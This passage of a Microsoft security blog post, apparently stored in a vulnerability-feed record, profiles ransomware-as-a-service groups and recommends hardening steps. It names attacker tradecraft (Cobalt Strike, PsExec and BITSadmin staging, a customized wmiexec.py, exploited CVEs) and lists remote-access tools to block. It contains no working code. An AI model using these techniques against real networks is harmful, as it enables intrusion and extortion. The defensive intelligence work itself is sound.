subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 